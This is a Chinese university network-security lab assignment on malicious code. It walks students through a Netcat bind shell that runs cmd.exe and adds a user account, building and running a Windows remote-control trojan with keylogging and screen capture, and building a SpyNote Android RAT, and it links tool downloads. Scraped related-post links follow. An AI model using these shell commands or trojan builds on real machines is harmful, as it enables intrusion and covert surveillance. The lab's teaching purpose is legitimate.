实验任务(四)---恶意代码技术
Chinese people’ public security university
网络对抗技术
实验报告
实验四 |
恶意代码技术 |
学生姓名 |
陈秋雨 |
年级 |
2015 |
区队 |
二 |
指导教师 |
高见 |
信息技术与网络安全学院
2018年10月17日
实验任务总纲
2018—2019 学年 第 一 学期
一、实验目的
1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.了解并熟悉常用的网络攻击工具,木马的基本功能;
3.达到巩固课程知识和实际应用的目的。
二、实验要求
1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。
2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。
3.软件工具可使用NC、MSF等。
4.实验结束后,保留电子文档。
三、实验步骤
1.准备
提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。
2.实验环境
描述实验所使用的硬件和软件环境(包括各种软件工具);
开机并启动软件office2003或2007、浏览器、加解密软件。
3.实验过程
1)启动系统和启动工具软件环境。
2)用软件工具实现实验内容。
4.实验报告
按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。
任务一 利用NC控制电脑
NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。
实验过程需要两个同学相互配合完成:
步骤一:
在受害者的机器 (同学A)
输入下面的命令:
nc.exe -l -p port -e cmd.exe 进入监听模式
步骤二:
在攻击者的机器.(同学B)
输入下面的命令:
nc ip port //连接victim_IP,然后得到一个shell。 (需要截图)
步骤三:
在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)
任务二 利用木马控制电脑
相关工具:
https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg
https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(备用,另外一个木马)
实验过程需要两个同学配合:
步骤一:
攻击者的机器. (同学A)IP地址为:192.168.163.128
打开上兴远程控制程序 生成木马sx.sever
步骤二:
点击菜单栏中的“生成”,在弹出的配置服务端中,配置回IP地址(攻击者IP)和端口号,并点击“生成服务端”按钮,生成木马服务端。
步骤三:
将生成的木马可执行程序拷贝到受害者的机器,并双击运行。
可以查看到主机上线
步骤四:
在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。
- 文件管理,尝试拷贝文件
- 屏幕控制,尝试获取桌面
3.键盘记录,尝试获取对方击键记录
4.会话管理,重启对方机器,查看是否能自启动上线
将主机关机后,主机下线
主机开机后上线
会话管理, 卸载对方的木马。
任务三 Android远控实践 所有过程截图写博客
相关工具下载:
需要先安装.net framework4.0 (自行搜索下载)
spynote及环境工具:(解压密码rekings.com)
https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg
android模拟器:
https://www.yeshen.com/
或
http://mumu.163.com/
实验步骤:
一、攻击者打开spynote软件,该软件需要先安装.netframework4.0和jdk环境。
二、配置并打开监听端口
点击Listen Port,在弹出的对话框中输入端口号,并点击Add按钮,最后点击OK,成功监听本地端口。【本过程选用3210端口,实验过程大家可以自己选择端口】
三、配置并生成木马
(1)点击Build Client按钮,弹出对话框
(2)配置回连IP和端口,IP地址填写运行spynote的机器IP,端口填写监听的端口号,本次填写3211端口。
(3)配置相关属性信息。
(4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。
(5)完成后,自动打开APK生成所在的文件夹。
四、将木马安装在Android模拟其中。
五、在Spynote中控制手机
可以在spynote中看到有一台机器上线,并可以查看其基本信息。
在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。
转载于:https://www.cnblogs.com/P201521420040/p/9850222.html
实验任务(四)---恶意代码技术相关推荐
- 实验四 恶意代码技术
学 号201421460014 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学 ...
- 实验四 恶意代码技术
实验报告 四 学 号 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 ...
- 实验四——恶意代码技术
学 号 201421430035 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 第四次实验 恶意代码技术
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 金轩宇 年级 2015 区队 ...
- 实验四恶意代码分析技术 201421430029
学 号:201421430029 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 网络对抗技术——实验四:恶意代码技术
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 王天宇 年级 2015级 ...
- 网络对抗技术_实验四_恶意代码技术
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 韩磊 年级 2014 区队 ...
- 【实验报告】四恶意代码实验
学 号201421420040 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 实验四 恶意代码
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 冷其航 年级 14级 区队 ...
- 20155222卢梓杰 实验四 恶意代码分析
实验四 恶意代码分析 1.系统运行监控 实验步骤如下 1.使用批处理监控程序连接网络的状况 在C盘要目录下建一个文件c:\netstatlog.bat,内容如下: date /t >> c ...
最新文章
- SFB 项目经验-18-三台前端服务器同时停止两台后-前端服务启不来
- computer vision(计算机视觉)方面的期刊会议,学术必备
- 九 Android基本知识介绍
- Java IO流 、 Properties 、 枚举
- HDU-6180 Schedule
- 缓存击穿、缓存失效及热点key的解决方案
- 论文笔记_S2D.30_2017-CSVT_使用全卷积深度残差网络,作为分类问题,从单目图像估计深度
- 正则表达式非捕获分组?:
- 心电信号matlab电路仿真实例,基于matlab的心电信号分析系统的设计与仿真.docx
- 论软件产品的易用性(二)
- 优惠券如何引流,如何做好优惠券推广,优惠券正确引流方法
- AR拍照的实现核心代码
- 3D模型欣赏:银发美女 ,性感女骑士
- vue 文字无缝滚动_vue文字横向滚动公告
- ArcGIS基础:面数据空洞填充的方法
- 分析师不死心 仍坚信微软终将成功并购雅虎
- C#类库推荐 拼多多.Net SDK,开源免费!
- java+selenium简单使用给斗鱼主播刷弹幕-.-
- 多机器人系统仿真平台(摘要与目录)
- GVM(openVAS)中scan configs为空的问题解决
热门文章
- java代码实现CGCS2000大地坐标系XY值转化为对应经纬度
- 【解决方案】数字孪生智慧光伏电站三维可视化系统
- 【一、视频处理】FPGA驱动OV7725摄像头模块
- 数学分析教程(科大)——1.12笔记+习题
- 3650m5设置u盘启动_联想启天M425台式机设置u盘启动两种模式(支持uefi/bios双启动)...
- 微信小程序开发:绑定手机号获取验证码功能
- 树莓派开机自动运行python程序的两种方式
- python-一个简易的购物系统
- 如何把m4a转换成mp3?音频格式转换步骤
- 鞋类电商出路考:成本洼地在哪里